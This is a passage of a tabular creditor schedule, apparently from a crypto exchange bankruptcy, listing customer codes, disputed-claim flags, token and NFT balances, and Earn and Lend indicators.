| 07412743 | | AAVE[0], BAT[0], BCH[0], BRZ[1], BTC[0], CUSDT[2], DOGE[1], ETH[0], LINK[0], LTC[0], PAXG[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.74], USDT[0.00000001] | Yes | |
| 07412745 | | USD[0.00], USDT[0] | | |
| 07412747 | | DOGE[8510.56665355], ETHW[.03504595], SHIB[83809389.31805062], SOL[74.83244058], USD[3102.44], USDT[0] | Yes | |
| 07412748 | | CUSDT[1], DOGE[1], USD[0.63] | Yes | |
| 07412754 | Contingent, Disputed | BRZ[1], BTC[.00329395], USD[66.13] | | |
| 07412765 | Contingent, Disputed | BTC[.00998079], TRX[1], USD[288.35] | | |
| 07412766 | | BRZ[1], BTC[0.00003494], DOGE[2], ETH[0], TRX[1] | | |
| 07412768 | Contingent, Disputed | USD[0.00] | | |
| 07412773 | | BTC[.0000354], GRT[1], USD[32.42] | | |
| 07412775 | | CUSDT[1], DOGE[262.20683833], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07412779 | | BTC[.00006408], GRT[1], USD[18.37] | | |
| 07412790 | | USD[0.00] | Yes | |
| 07412791 | Contingent, Disputed | BTC[.03052434], DOGE[1], GRT[1], USD[208.76] | | |
| 07412794 | Contingent, Disputed | BTC[.00035248], DOGE[1], TRX[1], USD[0.04] | | |
| 07412801 | | BRZ[2], CUSDT[3], DOGE[6], USD[0.01] | | |
| 07412805 | Contingent, Disputed | BTC[.00238119], DOGE[1], USD[383.51] | | |
| 07412806 | | DOGE[.57493808], ETH[.00303123], ETHW[0.00299019], TRX[1], USD[19.10] | Yes | |
| 07412808 | Contingent, Disputed | BTC[.00696745], DOGE[1], USD[137.57] | | |
| 07412812 | Contingent, Disputed | BTC[.00000373], CUSDT[1], TRX[1], USD[0.00] | | |
| 07412818 | | BAT[0], BCH[0], BTC[0], CUSDT[3], DOGE[0.00005554], ETH[0], GRT[0], KSHIB[0], LINK[0], LTC[0.00000005], MATIC[0], PAXG[0], SOL[0.01996978], SUSHI[0], TRX[1.00010077], UNI[0], USD[0.76], USDT[0.00376044], YFI[0.00001878] | Yes | |
| 07412823 | | BTC[.00510427], USD[0.00] | | |
| 07412827 | | DOGE[1], USDT[0.00000023] | | |
| 07412828 | Contingent, Disputed | BAT[1], BTC[.01803324], DOGE[1], USD[0.00] | | |
| 07412836 | | USD[0.00] | | |
| 07412844 | | DOGE[2], TRX[1], USD[0.00] | | |
| 07412848 | | ETH[0], USD[6.75] | | |
| 07412849 | | BTC[.0009] | | |
| 07412858 | | BTC[0.00001151], ETH[.000185], ETHW[.000185], LTC[.0099], SOL[0.00263243], SUSHI[0.12935074], USD[34.13], YFI[0] | | |
| 07412860 | | BTC[.00008263], ETH[.00000001], ETHW[0.02082000], GRT[.89541935], USD[0.00] | | |
| 07412861 | | BRZ[1], CUSDT[3], DOGE[644.31392856], TRX[2], USD[0.00] | | |
| 07412862 | | CUSDT[1], DOGE[1], TRX[1], USD[0.01] | | |
| 07412864 | | LINK[.0071996], LTC[0.00000562], USD[0.01] | | |
| 07412869 | | BAT[1], BTC[.00060463], LINK[21.85934711], NFT [4047051838645162981/The 2974 Collection #0148][1], NFT [503108493767833631/Doak Walker's Playbook: SMU vs. Santa Clara - September 27, 1947 #34][1], SHIB[57952520.19134483], TRX[1], USD[3.73], USDT[0.00000001], YFI[0] | Yes | |
| 07412870 | | BTC[.00351323], CUSDT[3], DOGE[106.25602760], ETH[.02364802], ETHW[.02335595], SHIB[726134.28379608], SOL[.14443478], TRX[2], USD[0.00] | Yes | |
| 07412872 | | USD[2.17] | | |
| 07412879 | | BTC[.0002], USD[995.35] | | |
| 07412881 | | DOGE[2], TRX[2131.382684], USD[0.00] | | |
| 07412886 | | BCH[0], BRZ[0], BTC[0], CUSDT[0], DAI[0], DOGE[1], ETH[0], GRT[0], LINK[0], PAXG[0], SHIB[14], SOL[0.00000001], TRX[0], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07412891 | | CUSDT[1], GRT[.01651683], USD[0.00] | Yes | |
| 07412894 | | USD[6.27] | | |
| 07412896 | | NEAR[7.99712872], USD[0.01], USDT[0.00000003] | | |
| 07412897 | | BTC[0.00677443], ETH[.00000001], ETHW[0.20200000], GRT[59.036], MATIC[0], SHIB[2200000], TRX[.341307], USD[7.87], USDT[0.17696059] | | |
| 07412903 | | BAT[1.0165555], BRZ[6.66325616], CUSDT[10], TRX[7], USD[0.00] | Yes | |
| 07412904 | | TRX[0.28428000], USD[7.16] | | |
| 07412905 | | USD[0.00] | | |
| 07412922 | | BTC[0], DOGE[0], USD[0.18] | | |
| 07412935 | | CUSDT[1], DOGE[44.16810162], SUSHI[0], USD[0.00] | | |
| 07412937 | | DOGE[1], USD[74.88] | | |
| 07412939 | | CUSDT[1], ETH[.00414344], ETHW[.00408872], MATIC[.01026649], SOL[.00002194], TRX[278.7546502], USD[0.00] | Yes | |
| 07412941 | | BTC[.00239507], CUSDT[678.10121512], DOGE[139.38089768], ETH[.10094085], ETHW[.10094085], LTC[.13802965], MATIC[5.05857398], SHIB[254065.0406504], SUSHI[1.87836272], TRX[5], USD[0.00] | | |
| 07412944 | | USD[0.00] | | |
| 07412947 | | BAT[8.04154888], BRZ[1], BTC[.00921178], CUSDT[90], DOGE[66.02916923], ETH[.13557457], ETHW[.13557457], GRT[25.06626697], KSHIB[253.9349248], LINK[.70566529], LTC[1.08511868], MATIC[13.47449276], PAXG[.0149146], SHIB[254013.41190814], SOL[3.32767512], SUSHI[2.16179318], TRX[317.42122609], UNI[1.15498015], USD[0.00] | | |
| 07412948 | | DOGE[2409.94757028], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07412953 | | BAT[4.00539887], BRZ[5.00087302], CUSDT[3], DOGE[30], CUSDT[3], GRT[4.03582691], NFT (289804334916997112/Gangster Gorillas #3154)[1], NFT (289929657145465119/Gangster Gorillas #2363)[1], NFT (289981988120588447/Gangster Gorillas #8565)[1], NFT (290544584633710561/Gangster Gorillas #5117)[1], NFT (297395413812806389/Gangster Gorillas #9988)[1], NFT (300378172659322367/Gangster Gorillas #2446)[1], NFT (301295573745693074/Gangster Gorillas #4426)[1], NFT (304852206069578683/Gangster Gorillas #3830)[1], NFT (307686651205516751/Gangster Gorillas #9514)[1], NFT (312405677101342280/Gangster Gorillas #2143)[1], NFT (314673898923704489/Gangster Gorillas #8320)[1], NFT (316255683340025888/Gangster Gorillas #6408)[1], NFT (317139032914440804/Gangster Gorillas #4264)[1], NFT (318487041854848979/Gangster Gorillas #3268)[1], NFT (324109052061580665/Gangster Gorillas #4846)[1], NFT (325540892557369856/Gangster Gorillas #5104)[1], NFT (337281262045246052/Gangster Gorillas #3231)[1], NFT (337330813241751891/Gangster Gorillas #795)[1], NFT (338757369962010461/Gangster Gorillas #9578)[1], NFT (342298944735930085/Gangster Gorillas #7551)[1], NFT (346537035455324541/Gangster Gorillas #7871)[1], NFT (348401626021786306/Gangster Gorillas #9644)[1], NFT (356680085460985319/Gangster Gorillas #3650)[1], NFT (357677106926563952/Gangster Gorillas #1811)[1], NFT (360688431263906894/Gangster Gorillas #8554)[1], NFT (361792032448054569/Gangster Gorillas #6204)[1], NFT (363696244130914776/Gangster Gorillas #8125)[1], NFT (364189920945434764/Gangster Gorillas #5097)[1], NFT (370380853253080839/Gangster Gorillas #8510)[1], NFT (370429317187485112/Gangster Gorillas #7214)[1], NFT (372937726978793753/Gangster Gorillas #8224)[1], NFT (379739811849493648/Gangster Gorillas #8858)[1], NFT (380893337971903891/Gangster Gorillas #9258)[1], NFT (381259613634226349/Gangster Gorillas #9959)[1], NFT (385062437026512089/Gangster Gorillas #9364)[1], NFT (387027309356368358/Gangster Gorillas #4097)[1], NFT (393572921474460267/Gangster Gorillas #9262)[1], NFT (396175600930731111/Gangster Gorillas #7264)[1], NFT (397268102867702850/Gangster Gorillas #1385)[1], NFT (400174274305780857/Gangster Gorillas #2311)[1], NFT (404281553936940584/Gangster Gorillas #5507)[1], NFT (404533180780033299/Gangster Gorillas #3041)[1], NFT (408803826007388346/Gangster Gorillas #1597)[1], NFT (413295685116273638/Gangster Gorillas #8457)[1], NFT (421477427608189184/Gangster Gorillas #5717)[1], NFT (424904285521167188/Gangster Gorillas #1718)[1], NFT (428053907528030533/Gangster Gorillas #2231)[1], NFT (431229840953302359/Gangster Gorillas #5685)[1], NFT (435524687648687118/Gangster Gorillas #7736)[1], NFT (443579053200495770/Gangster Gorillas #7743)[1], NFT (447112259787781004/Gangster Gorillas #2252)[1], NFT (447273856050230364/Gangster Gorillas #2480)[1], NFT (449286397086660079/Gangster Gorillas #9794)[1], NFT (456804580345184912/Gangster Gorillas #4467)[1], NFT (457447366103139565/Gangster Gorillas #4484)[1], NFT (458633047533354594/Gangster Gorillas #8783)[1], NFT (463496761982302904/Gangster Gorillas #5208)[1], NFT (463829980447105426/Gangster Gorillas #6083)[1], NFT (464070590089639924/Gangster Gorillas #6555)[1], NFT (464173169147378696/Gangster Gorillas #7102)[1], NFT (464539180784758738/Gangster Gorillas #6810)[1], NFT (465016211497978320/Gangster Gorillas #4009)[1], NFT (465956601022110273/Gangster Gorillas #8203)[1], NFT (467017676042267550/Gangster Gorillas #2827)[1], NFT (468053648058248265/Gangster Gorillas #5461)[1], NFT (474257903361875528/Gangster Gorillas #7739)[1], NFT (474654749654936313/Gangster Gorillas #7271)[1], NFT (476880130904527075/Gangster Gorillas #7017)[1], NFT (480643051582378748/Gangster Gorillas #9459)[1], NFT (483384064301084089/Gangster Gorillas #1223)[1], NFT (484495155427940819/Gangster Gorillas #375)[1], NFT (484858119414043234/Gangster Gorillas #8522)[1], NFT (487798963615953208/Gangster Gorillas #7525)[1], NFT (489778456537715980/Gangster Gorillas #9228)[1], NFT (490797791515735814/Gangster Gorillas #7905)[1], NFT (491862442356107394/Gangster Gorillas #2521)[1], NFT (493372758629000443/Gangster Gorillas #3880)[1], NFT (495360557019013424/Gangster Gorillas #4729)[1], NFT (498623987795226328/Gangster Gorillas #9834)[1], NFT (499908564907459466/Gangster Gorillas #9067)[1], NFT (503189496865098716/Gangster Gorillas #1841)[1], NFT (503887526580014878/Gangster Gorillas #5745)[1], NFT (504611366233651052/Gangster Gorillas #2958)[1], NFT (509642921703818932/Gangster Gorillas #9344)[1], NFT (513011820474396442/Gangster Gorillas #8404)[1], NFT (513493163870924575/Gangster Gorillas #8078)[1], NFT (517958024219224426/Gangster Gorillas #7880)[1], NFT (518806733152228641/Gangster Gorillas #4416)[1], NFT (519943660339209518/Gangster Gorillas #2361)[1], NFT (524341273085878438/Gangster Gorillas #3164)[1], NFT (527863807281532734/Gangster Gorillas #1954)[1], NFT (528588286533459042/Gangster Gorillas #9891)[1], NFT (529252073648839760/Gangster Gorillas #784)[1], NFT (542171420781521858/Gangster Gorillas #7885)[1], NFT (549694634196777870/Gangster Gorillas #7692)[1], NFT (549975598779027868/Gangster Gorillas #129)[1], NFT (551353181761242120/Gangster Gorillas #2841)[1], NFT (552051959798533504/Gangster Gorillas #9798)[1], NFT (554426534516342255/Gangster Gorillas #6353)[1], NFT (558918265500522532/Gangster Gorillas #1822)[1], NFT (561948203614729173/Gangster Gorillas #9732)[1], NFT (566030560772885692/Gangster Gorillas #9160)[1], NFT (572602138048108439/Gangster Gorillas #3254)[1], NFT (574455384838712057/Gangster Gorillas #380)[1], SHIB[7], SOL[3.92137646], TRX[10.12659342], USD[251.21], USDT[0] | Yes | |
| 07412960 | | USD[0.00], USDT[0.00000359] | | |
| 07412966 | | BTC[0], DOGE[.14], ETH[.000055], ETHW[.000055] | | |
| 07412981 | | UNI[98.41779957] | | |
| 07412987 | | SHIB[1800.1800.180018], USD[0.00] | | |
| 07412991 | | BTC[0.00000432], DOGE[183.996], NFT (371163332883133247/Let it ⊛ #3)[1], NFT (404091093338403097/Let it ⊛ #2)[1], NFT (442965643587903342/Spain Scenery)[1], USD[1.11] | | |
| 07413003 | | SOL[68.58598228], USD[0.00] | | |
| 07413006 | | BTC[.00028543], USD[0.00], USDT[0] | | |
| 07413008 | | BAT[2.05665509], CUSDT[3], DAI[0], DOGE[1], ETH[0], LINK[0], MATIC[0], MKR[0.00131500], SHIB[0], SOL[0.00040244], SUSHI[1.07016684], TRX[2], UNI[0], USD[1.29], USDT[0] | Yes | |
| 07413011 | | BAT[16.37858867], BRZ[1], CUSDT[5], DOGE[264.06733142], GRT[10.90245669], SOL[.52044989], SUSHI[4.37720158], TRX[97.01136097], USD[0.00] | Yes | |
| 07413021 | | BRZ[2], CUSDT[3], DOGE[8], ETHW[1.83182714], MATIC[459.23084912], NFT (464208747064544790/FTX - Off The Grid Miami #4677)[1], TRX[8], USD[0.00], USDT[2] | | |
| 07413022 | | USD[45.00] | | |
| 07413023 | | BAT[1.13621583], BRZ[5], BTC[0], CUSDT[31], DOGE[4], ETH[0], GRT[1.07732988], TRX[10], USD[0.93], USDT[0.00006183] | | |
| 07413024 | | USD[0.00] | | Yes |
| 07413028 | | ETHW[.000135], USD[0.40] | | |
| 07413030 | | BRZ[13.33152571], CUSDT[42.9843207], KSHIB[.30586889], TRX[1], USD[0.00], USDT[0] | | Yes |
| 07413035 | | CUSDT[3], TRX[1.000007], USDT[0] | | |
| 07413038 | | BTC[.00038291], CUSDT[177.00474846], DOGE[3.82788272], SUSHI[.90885267], USD[0.00] | | |
| 07413051 | | USD[5.00] | | |
| 07413055 | | BTC[0] | | |
| 07413062 | | LINK[214.5384], SOL[355.932] | | |
| 07413064 | | SOL[0.00000001], TRX[0], USD[0.00] | | |
| 07413065 | | DOGE[2], USD[20.31] | | |
| 07413067 | | CUSDT[1], DOGE[2], ETH[.53547036], ETHW[.53524542], SHIB[1], SOL[53.87064024], TRX[2], USD[0.00] | | Yes |
| 07413072 | | ETH[.00000001], ETHW[.00000001] | | |
| 07413078 | | BAT[0], BTC[0], USD[0.32] | | Yes |
| 07413080 | | TRX[.000001], USDT[.004516] | | |
| 07413089 | | BAT[1], DOGE[21876.95503449], GRT[1], TRX[2], USD[0.00], USDT[0] | | Yes |
| 07413090 | | BAT[1], CUSDT[2], DOGE[3], TRX[.000003], USDT[0.00000787] | | |
| 07413092 | | CUSDT[3], DOGE[20377.91660827], SHIB[1], SOL[78.26479741], TRX[8116.03286304], USD[0.00] | | |
| 07413100 | | BTC[0], DOGE[0], GRT[0], TRX[0], USD[0.74] | | |
| 07413102 | | USD[0.00] | | |
| 07413110 | | BTC[0], ETH[0.00000001], ETHW[0.00000001], USD[0.00] | | |
| 07413113 | | CUSDT[2], DOGE[1], ETH[0], SOL[0], USD[0.00] | | |
| 07413114 | | ETHW[.00078635], SOL[.00225445], SUSHI[.152], USD[0.57] | | |
| 07413117 | | BRZ[2], BTC[0], CUSDT[4], DOGE[1364.67616634], GRT[3.07497606], TRX[5], USD[0.00], USDT[1.0694465] | | Yes |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07413128 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07413129 | | BTC[.00000001], CUSDT[2], ETH[.00000024], ETHW[.00000024], SOL[.00000296], SUSHI[1.30726005], TRX[1], USD[0.00] | Yes | |
| 07413132 | | BTC[.00000304], CUSDT[6], DOGE[7.81776138], TRX[.00948234], USD[0.01] | | |
| 07413138 | | BTC[.00211876], CUSDT[3], DOGE[153.55791926], ETH[0.01387758], ETHW[0.01387758] | | |
| 07413139 | | DOGE[3000.5643], ETH[.00094015], ETHW[.00094015], USD[0.01] | | |
| 07413146 | | BAT[0], BTC[0.03780909], CUSDT[28514.23629943], DOGE[13690.94433774], ETH[0.53567374], ETHW[0.53492406], GRT[0], LINK[0], MATIC[16.27232805], SHIB[2], SOL[0], SUSHI[0], TRX[1], UNI[1.21819113], USD[610.60], USDT[0], YFI[0.00051347] | Yes | |
| 07413152 | | LTC[.00703819], SOL[1303.695], USD[0.71] | | |
| 07413154 | | CUSDT[1], DOGE[231.48327833], USD[50.01] | | |
| 07413157 | | BRZ[1], CUSDT[6], DOGE[2993.25175306], SHIB[2], TRX[2], USD[0.00], USDT[0] | | |
| 07413158 | | USD[0.00] | | |
| 07413160 | | SOL[.0044], USD[0.58] | | |
| 07413162 | | USD[0.00] | | |
| 07413165 | | TRX[.000003], USD[4.76], USDT[.000023] | | |
| 07413171 | | ETH[.00046], ETHW[.00046], LTC[.0045], SOL[.00324] | | |
| 07413173 | Contingent, Disputed | DOGE[74.33819607], USD[0.00] | | |
| 07413175 | | SOL[1.27105], USD[29.02], USDT[1.42852267] | | |
| 07413176 | | CUSDT[2], DOGE[3], ETH[.06329158], ETHW[.06329158], GRT[1], TRX[2], USD[0.00] | | |
| 07413178 | | DAI[0], DOGE[1], USD[0.00] | Yes | |
| 07413181 | | ETH[.00024751], ETHW[.00024751], NFT (434893485477389980/Spectra #28)[1], NFT (459935203207305666/Reflection '07 #23)[1], USD[209.11] | | |
| 07413183 | Contingent, Unliquidated | ETH[0], ETHW[0.00029950], SOL[0], USD[2000.00], USDT[0.00000005] | | |
| 07413184 | | BTC[0], DOGE[.00000766], ETH[.00000096], ETHW[.00000096], SOL[.0076], USD[0.00] | | |
| 07413187 | | SOL[2.05], USD[0.17] | | |
| 07413195 | | BRZ[1], BTC[0], CUSDT[3], DOGE[1], ETH[0], GRT[0], SOL[0], TRX[6], USD[0.92], USDT[0] | | |
| 07413196 | | BAT[0], CUSDT[0], DOGE[1], TRX[55.29197482], USD[0.01], USDT[0] | | |
| 07413198 | Contingent, Disputed | BRZ[1], USD[0.00] | | |
| 07413203 | | BTC[0], ETH[0], ETHW[0], USD[0.00], USDT[0] | | |
| 07413207 | | BRZ[1.00126311], KSHIB[7305.14592296], SHIB[4], TRX[3], USD[0.34], USDT[0] | Yes | |
| 07413209 | | BAT[15.21809781], BRZ[473.6220243], CUSDT[7280.70090198], DAI[21.97915589], DOGE[2092.51899514], GRT[68.41012759], KSHIB[670.82841161], SUSHI[3.17513512], TRX[1157.23478569], USD[0.00], USDT[27.5645183] | Yes | |
| 07413210 | | ETH[.00022866], ETHW[.00022866], USD[2.05] | | |
| 07413217 | | CUSDT[1], USD[0.00] | | |
| 07413218 | | BAT[0], USD[1.05], USDT[0] | | |
| 07413221 | | USD[0.80] | | |
| 07413222 | | CUSDT[1], DOGE[2], ETH[0], TRX[2], USD[0.00], USDT[1] | | |
| 07413223 | | USD[0.00] | Yes | |
| 07413230 | | TRX[1], USD[0.00] | Yes | |
| 07413231 | | BTC[.00063308], CUSDT[2], DOGE[593.68473447], ETH[.01829195], ETHW[.01805987], SOL[.0768714], TRX[1], USD[0.00] | Yes | |
| 07413233 | | BAT[82.34107735], CUSDT[6], DOGE[298.77134987], ETH[.50954614], ETHW[.50933224], TRX[3], USD[0.65] | Yes | |
| 07413235 | | SOL[.00000001], USD[9481.09] | | |
| 07413239 | | SOL[.00041065], TRX[1], USD[0.00] | Yes | |
| 07413241 | | SOL[.7066], USDT[7.23879659] | | |
| 07413247 | | USD[0.00] | | |
| 07413249 | | USD[0.04] | | |
| 07413252 | | DOGE[106.15904067], ETH[.05661959], ETHW[.05661959], LINK[0], SOL[.51523621], SUSHI[0], USD[0.00] | | |
| 07413254 | | LTC[.51792], USD[0.72] | | |
| 07413256 | | BTC[0.00002299], DOGE[.827], LTC[.00608], SOL[.417] | | |
| 07413260 | Contingent, Disputed | BTC[0], USD[0.00], USDT[0.00000002] | | |
| 07413262 | | CUSDT[1], DOGE[1], TRX[.000001], USDT[0.00000373] | Yes | |
| 07413263 | | BRZ[2], CUSDT[3], TRX[2], USD[0.00], USDT[1] | | |
| 07413269 | | CUSDT[1], SOL[.34694991], USD[0.03] | Yes | |
| 07413270 | | CUSDT[1.00000519], USD[0.00] | | |
| 07413277 | | CUSDT[6], TRX[69.59911649], USD[0.00] | | |
| 07413282 | | BF_POINT[100], BTC[0] | | |
| 07413287 | | CUSDT[1], DAI[2.19908883], TRX[41.41376606], USD[6.65] | Yes | |
| 07413288 | | USD[0.06] | | |
| 07413293 | | AAVE[.00944], BTC[0.00006062], ETH[.00477], ETHW[.000477], USD[0.00] | | |
| 07413294 | | BF_POINT[300], ETHW[0.0014646], NEAR[.00044473], NFT (495520082655588668/Gilligan)[1], SHIB[32], SUSHI[.00002494], USD[1.88], USDT[0] | Yes | |
| 07413295 | | BTC[0], SOL[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07413297 | | SOL[.00023383], USD[0.00] | Yes | |
| 07413298 | Contingent, Disputed | BTC[.00000951], CUSDT[1], DOGE[1], ETH[.2707664], ETHW[.2707664], USD[51.13] | | |
| 07413300 | | CAD[1.24], CUSDT[1.61946416], DAI[6.3651383], DOGE[5], EUR[2.11], GBP[12.59], GRT[.58445218], SOL[.02325034], TRX[14.37438162], UNI[.00000017], USD[1.69], USDT[.00033938] | | |
| 07413319 | | BTC[0], ETH[0], SOL[0], USD[0.00] | | |
| 07413324 | | USD[0.01], USDT[0] | | |
| 07413325 | | BTC[.01201801], USD[2.05] | Yes | |
| 07413326 | | CUSDT[472.92772529], DAI[9.92522681], DOGE[148], TRX[211.73409162], USD[26.63], USDT[9.94606141] | | |
| 07413328 | | BRZ[1], CUSDT[1], DOGE[10.02267403], TRX[4], USD[0.01], USDT[1.02543197] | Yes | |
| 07413330 | | SUSHI[0.23988232], USD[0.00], USDT[363.98840634] | | |
| 07413332 | | GRT[1], SOL[151.16795434], USD[0.00] | Yes | |
| 07413333 | Contingent, Disputed | SUSHI[.136], USD[0.00], USDT[0] | | |
| 07413337 | Contingent, Disputed | BTC[.00122507], DOGE[1], TRX[1], USD[0.77] | | |
| 07413340 | | USD[0.00] | | |
| 07413341 | | USD[0.08] | | |
| 07413342 | | CUSDT[1], USD[0.01] | | |
| 07413345 | | USD[0.28], USDT[0] | | |
| 07413349 | | USD[0.01], USDT[0] | | |
| 07413367 | | SOL[.01740986], USD[0.04] | | |
| 07413379 | | BTC[0], DOGE[.243], USD[0.00], USDT[0] | | |
| 07413382 | | USD[0.00] | | |
| 07413386 | | ETH[0], USD[0.00] | | |
| 07413388 | | BRZ[175.62197555], CUSDT[948.74229184], TRX[122.81676549], USD[2.36] | | |
| 07413389 | | CUSDT[5], DOGE[6], ETH[.00000001], TRX[1], USD[0.01], USDT[34.86348956] | | |
| 07413397 | | BTC[0.00008237], SUSHI[.18], USD[1.16] | | |
| 07413399 | | BAT[0], CUSDT[0], DOGE[0], LTC[0], MATIC[0], TRX[0], USD[0.00], USDT[0.00000001] | Yes | |
| 07413410 | | CUSDT[468.87114592], DOGE[1], SOL[.00849456], USD[89.91], USDT[9.94109296] | | |
| 07413411 | | CUSDT[1], DOGE[2], ETH[.07612436], ETHW[.07518082], TRX[1731.90647985], USD[0.00] | Yes | |
| 07413413 | | CUSDT[2], DOGE[1297.6790769], USD[0.00] | | |
| 07413415 | | BTC[0], ETHW[6.51180315], USD[17907.78] | | |
| 07413418 | | USD[0.01] | | |
| 07413422 | | ETH[0.00058276], ETHW[0.00057362], USD[0.00] | | ETH[.000555] |
| 07413424 | | LINK[.00000001], SOL[0] | | |
| 07413426 | | BAT[3.18401736], CUSDT[1], DOGE[1], GRT[2.003146], NFT [427100690968610946/Barcelona Ticket Stub #1014][1], NFT [462015708889105568/Saudi Arabia Ticket Stub #1748][1], SOL[.0120696], TRX[5], USD[0.00], USDT[1.06923544] | Yes | |
| 07413430 | | USD[0.30], USDT[0] | | |
| 07413435 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07413449 | | CUSDT[1], ETH[.06877347], ETHW[.06791998], TRX[1], USD[0.00] | Yes | |
| 07413451 | | ETH[.01], ETHW[.01], NFT [327443526334155343/Forbes VNFTB: Lisette Schulz][1], NFT [400371700886427898/Romeo #1739][1], NFT [457456727433665959/FTX - Off The Grid Miami #2141][1] | | |
| 07413452 | | BTC[.00001236] | | |
| 07413454 | | BRZ[1], BTC[.00000033], CUSDT[8], DOGE[1.00004935], ETH[.065223], ETHW[.065223], GRT[.00587812], SUSHI[5.5853414], TRX[317.83247886], USD[0.01] | | |
| 07413460 | | ETH[.51924367], ETHW[.51924367], SOL[26.67302585], TRX[11344.21206438], USD[0.00] | | |
| 07413462 | | AVAX[.00146313], BAT[1], SHIB[1], UNI[1.02543197], USD[0.00], USDT[0.01859494] | Yes | |
| 07413463 | | BRZ[1], CUSDT[1], DOGE[1], USD[0.01] | | |
| 07413464 | | CUSDT[2], DOGE[1.10199853], TRX[1], USD[112.06] | | |
| 07413465 | | BTC[0], DOGE[0.08770067], TRX[0.22319875], USD[1.40], USDT[0.00249318] | | |
| 07413469 | | BTC[0], USD[7.42] | | |
| 07413478 | | TRX[512.94], USD[0.13] | | |
| 07413482 | | BAT[1], DOGE[3], SHIB[9], SOL[0], TRX[1], USD[0.01] | | |
| 07413492 | | BRZ[1], SOL[111.46818011], USD[10.69] | Yes | |
| 07413498 | | USD[0.98], USDT[0.99391067] | | |
| 07413504 | | CUSDT[1], TRX[2], USD[0.19] | | |
| 07413512 | | LINK[3.996], USD[1.04], USDT[0] | | |
| 07413520 | | CUSDT[2314.43572961], TRX[1], USD[1.04] | | |
| 07413525 | | DOGE[1], USD[0.00] | | |
| 07413529 | | BTC[.00003153], USD[0.00] | | |
| 07413530 | | BTC[.00025876], CUSDT[3], DAI[16.41599825], DOGE[290.10009408], ETH[.01777248], ETHW[.0175536], SOL[1.15138417], SUSHI[2.608599], TRX[125.39545671], USD[0.00] | Yes | |
| 07413535 | | BRZ[2], CUSDT[3], EUR[0.00], LINK[.00008061], TRX[1], UNI[.00010247], USD[0.00] | Yes | |
| 07413536 | | TRX[.000013], USD[0.00], USDT[0] | | |
| 07413537 | | BCH[.05461117], CUSDT[1], DOGE[457.50461931], ETH[.00871859], ETHW[.00871859], KSHIB[69.8798737], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07413538 | | BRZ[1], CUSDT[1], SHIB[1], TRX[1], USD[48.73], USDT[0] | | |
| 07413548 | | BAT[0], BTC[0], DOGE[0], ETH[0], ETHW[0], TRX[0], UNI[0], USD[0.00], USDT[0], YFI[0] | | |
| 07413555 | | BTC[0], DOGE.79896883], ETH[0.00113989], ETHW[0.00113989], GRT[0], SHIB[9], SOL[0], TRX[2], USD[-1.11], USDT[0] | Yes | |
| 07413562 | Contingent, Disputed | DOGE[1], TRX[1], USD[0.66] | | |
| 07413563 | | SOL[.4923108] | | |
| 07413568 | Contingent, Disputed | BRZ[1], BTC[.01196643], CUSDT[1], DOGE[1], SOL[1], USD[0.57] | | |
| 07413583 | | ETH[.000779], ETHW[.000779], TRX[.64374], USD[0.00] | | |
| 07413587 | | TRX[789.179458] | | |
| 07413589 | | USD[0.00] | | |
| 07413611 | | CUSDT[1], DOGE[4], GRT[1], PAXG[.00000001], USD[0.00], USDT[0.00000057] | | |
| 07413622 | | AAVE[.02990211], BRZ[5.07952967], CUSDT[67.115892], DOGE[4], SHIB[8484045.50739272], TRX[10], USD[0.13], USDT[0] | Yes | |
| 07413643 | | BTC[.00008404], USD[65.78] | | |
| 07413647 | | SOL[0], USD[0.00] | | |
| 07413655 | | USD[16.02] | | |
| 07413657 | | ETH[.002101], ETHW[1.002101], SOL[0.00657832], USD[0.00], USDT[0.00000001] | | |
| 07413661 | | CUSDT[1], DOGE[188.00262831], TRX[1], USD[0.00] | Yes | |
| 07413666 | | BTC[0.00043980], USD[0.00] | | |
| 07413678 | Contingent, Disputed | BTC[.0008791], GRT[1], USD[16.70] | | |
| 07413687 | | BTC[0], DOGE[0], LTC[0], SOL[0], SUSHI[0] | | |
| 07413699 | | USD[0.00] | Yes | |
| 07413705 | | AUD[1.00], BTC[.0000877], DOGE[.685], LINK[.0022], LTC[.00607111], SOL[.0091], TRX[.000002], UNI[.0399], USD[1.00], USDT[.0013] | | |
| 07413711 | | USD[0.00] | | |
| 07413715 | | AVAX[1.1], ETH[.007], ETHW[.007], MATIC[20], NEAR[.3], UNI[1.1], USD[3.19] | | |
| 07413716 | | USD[0.00], USDT[0] | | |
| 07413722 | | TRX[517.39230758], USD[0.00] | | |
| 07413725 | | BRZ[1], CUSDT[1], DOGE[76.39493523], TRX[1], USD[0.00] | | |
| 07413726 | | NFT (366403428477941062/Entrance Voucher #3189)[1] | | |
| 07413735 | | BTC[.03202636], CUSDT[1], DOGE[3], ETH[1.0072323], ETHW[1.0072323], TRX[343.07427585], USD[0.00] | | |
| 07413736 | | USD[0.01], USDT[0] | | |
| 07413740 | | DOGE[2.23815845], TRX[1], USD[0.01] | Yes | |
| 07413747 | | AVAX[0], BTC[0], DOGE[0.44861313], ETH[0.00999999], ETHW[0.01000000], GRT[9.35968767], LTC[0], MATIC[4.11999517], SOL[3.49000000], USD[-2.49], USDT[0] | | |
| 07413748 | | USD[0.01] | | |
| 07413752 | | BTC[0.00000001], ETH[0.00000095], ETHW[.00000094], LTC[0], NFT (451579140966737891/Golden Village)[1], TRX[.000174], USD[0.60], USDT[0.00048512] | | |
| 07413755 | | SOL[2.5987], USD[0.01], USDT[7.06346] | | |
